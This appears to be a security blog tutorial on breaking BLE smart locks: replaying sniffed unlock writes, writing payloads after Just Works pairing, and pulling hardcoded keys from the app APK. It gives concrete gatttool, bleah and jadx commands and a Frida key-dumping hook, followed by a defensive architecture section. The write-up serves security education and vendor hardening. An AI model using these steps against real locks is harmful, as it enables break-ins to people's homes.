A security engineer hands you their new smart lock. It passed FCC certification, the mobile app has four stars, and the marketing copy mentions "military-grade encryption." You have a laptop, a BLE dongle, and about two hours. By the time you're done, you can open their front door from the parking lot.
This is not a hypothetical.
I want to walk through how that actually happens, step by step, on real hardware. Not a theoretical model of what "could" be exploited, but what you do, what you look for, and where these products consistently break.
Attack 1: Replay the Unlock Command
This is the most common failure I see, and it's embarrassing how often it works.
The vulnerability
The lock communicates over BLE. The mobile app sends an "unlock" GATT write to a specific characteristic. The lock checks the value, decides it looks right, and opens. No challenge-response. No nonce. No timestamp. The same byte sequence that opened the door at 9 AM will open it at 9 PM, or next Tuesday.
The exploitation method
You don't need to know anything about the protocol to pull this off.
- Open Wireshark with a BLE capture plugin, or use
btlejuice/bettercapwith BLE sniffing enabled. - Stand near the target, wait for the legitimate owner to unlock the door, capture the full HCI log.
- Identify the GATT write packet. In Wireshark, filter on
btatt.opcode == 0x52(Write Command) or0x12(Write Request). You're looking for writes to a handle associated with a service UUID that isn't standard (not battery, not GAP). - Replay that exact write using
gatttoolorgatt.pyfrom the victim's handle:
gatttool -b AA:BB:CC:DD:EE:FF --char-write-req -a 0x0025 -n 4f50454e
The lock opens.
The attacker workflow here is passive first, then active. You spend most of your time just watching traffic. The replay itself takes under a minute.
Real-world impact
An attacker sitting in a car near someone's house can capture the unlock during morning departure and replay it that afternoon. No tools beyond a laptop and a $15 BLE dongle. No malware, no account compromise, no social engineering.
The unlock command is effectively a static password transmitted in cleartext.
Attack 2: GATT Authentication Gaps
Even when the vendor encrypts the connection, the GATT layer often has no real authorization model.
The vulnerability
BLE LE Secure Connections encrypts the link. But encryption is not authentication. Once you have an encrypted connection, the question is: which characteristics require authentication, and what does "authenticated" actually mean?
On a surprising number of locks, the answer is: the characteristic just exists, and any connected peer can write to it. The lock pairs with "Just Works" (no passkey, no OOB), which means any device can pair, and once paired, any device is "authenticated."
The exploitation method
- Use
nRF Connect(mobile) orbleah/gattackerto scan and enumerate the lock's GATT profile without pairing. - Look for writable characteristics outside the standard BLE profiles. UUID
0x2A00is device name. UUID0x2A37is heart rate. Non-standard UUIDs (128-bit, vendor-specific) are where the interesting stuff lives. - Attempt a pairing with Just Works. Most consumer locks will accept it because they need to be user-friendly out of the box.
- Walk through writable characteristics and send known unlock payloads:
0x01(simple boolean flag)4f50454e("OPEN" in ASCII)deadbeef(padding test)
On some devices I've tested, the unlock characteristic is readable too, which will tell you exactly what the current expected value is.
# enumerate
bleah -a AA:BB:CC:DD:EE:FF
# write to target characteristic after pairing
gatttool -b AA:BB:CC:DD:EE:FF -t random --sec-level=high \
--char-write-req -a 0x002b -n 01
Real-world impact
An attacker near the lock pairs once, writes to the unlock characteristic, and the door opens. No app. No credentials. The Just Works pairing model provides zero assurance about who is on the other end of the connection, and the lack of characteristic-level authorization means the lock cannot distinguish the legitimate app from a random script.
Attack 3: The Secret Was in the APK the Whole Time
When encryption is present and the GATT profile looks locked down, the next place to look is the mobile app itself.
The vulnerability
Many BLE lock implementations use a shared secret to authenticate the unlock command. The lock expects a specific HMAC or AES-encrypted payload. The app constructs this payload on the client side using a key embedded in the app binary or stored in a config file. The key never changes across users or devices.
This is fundamentally broken. A shared static key embedded in a distributed binary is not a secret.
The exploitation method
- Pull the APK:
adb backupfor debug builds, or download from a third-party mirror. - Decompile with
jadxorapktool:
jadx -d output/ target.apk
- Search for likely key material:
grep -r "AES\|HMAC\|secret\|key\|unlock" output/ --include="*.java" -l
- Look at the class handling BLE writes. You're looking for the function that constructs the characteristic value before sending it. It usually calls something like
cipher.init(Cipher.ENCRYPT_MODE, secretKeySpec). - Extract the hardcoded key, nonce, or seed. In several cases I've seen 16-byte AES keys just sitting in a
static final byte[]array. - With the key in hand, you can generate valid unlock payloads for any device using that firmware version.
If the app is React Native or Flutter, the logic often lives in JavaScript or Dart bundles that are trivially readable without decompilation. If it's native, you may need a pass with Frida to hook the key derivation at runtime:
// Frida snippet targeting javax.crypto.spec.SecretKeySpec
Java.perform(function() {
var SecretKeySpec = Java.use('javax.crypto.spec.SecretKeySpec');
SecretKeySpec.$init.overload('[B', 'java.lang.String').implementation = function(key, algo) {
console.log('Key material: ' + bytesToHex(key));
return this.$init(key, algo);
};
});
Real-world impact
One extracted key compromises every lock using that firmware. You're not attacking one door. You're attacking the entire product line. This has happened in the wild. Lock vendors have shipped identical keys across millions of units, and once that key surfaces in a forum or a GitHub repo, the product is effectively broken for every customer simultaneously.
Why These Failures Keep Shipping
It is worth saying plainly: these are not hard problems to solve. The engineering community has known how to do challenge-response authentication, rolling codes, and proper key management for decades.
What actually happens in production is a combination of factors:
Firmware teams and app teams don't talk. The lock firmware engineer assumes the app will enforce authentication. The app engineer assumes the lock enforces it. Neither writes it down. Neither tests for it.
"Works in the demo" is the only test. The happy path ships. Nobody runs a threat model. Nobody sits next to the lock with a sniffer before launch.
Consumer pressure on pairing UX. Just Works exists because passkey entry on a door lock is terrible user experience. The alternative, LE Secure Connections with OOB, requires NFC or QR-code provisioning flows that add cost and complexity. Vendors skip it.
Key management is genuinely hard. Per-device key provisioning during manufacturing, cloud-backed key rotation, and secure key storage on constrained embedded hardware are all solvable problems, but they require investment. A startup trying to ship does not always make that investment.
What a Defensible Architecture Actually Looks Like
Rolling codes, or at minimum a challenge-response protocol, should be non-negotiable. The lock sends a random nonce on connection. The app responds with HMAC-SHA256(nonce + timestamp, per-device-key). The lock verifies it. Static replay is dead.
Per-device provisioning means each lock gets a unique key during manufacturing, stored in a hardware-backed secure element if the SoC supports it (most do today, even cheap ones). The mobile app receives the key during pairing via the cloud backend, not baked into the APK.
Characteristic-level authorization should be explicit. Writable unlock characteristics should require an authenticated session, not just an encrypted connection. Use BLE Security Mode 1, Level 3 (authenticated pairing with encryption) or Level 4 (LE Secure Connections) and enforce it at the attribute permission level.
OTA updates need signed firmware. If your lock accepts arbitrary firmware over BLE, you do not have a smart lock. You have a remotely-programmable deadbolt. ECDSA signature verification over the update image before flashing is table stakes.
App-side secrets are not secrets. If your protocol requires the mobile app to know a key, that key is public. Design protocols that assume a compromised client.
Where This Leaves Us
The locks I have tested that fail these checks are not obscure hardware from fly-by-night vendors. They are products with real market share, positive reviews, and "smart home compatible" badges. The vulnerabilities are not sophisticated. They are boring, and they are repeatable.
If you are building a lock or evaluating one, the bar is not that high. Rolling codes and per-device keys take a few weeks of engineering work. What it requires is actually running the threat model, and not shipping until it passes.
The attacker's workflow I described above takes an afternoon. Your defense should take more than that.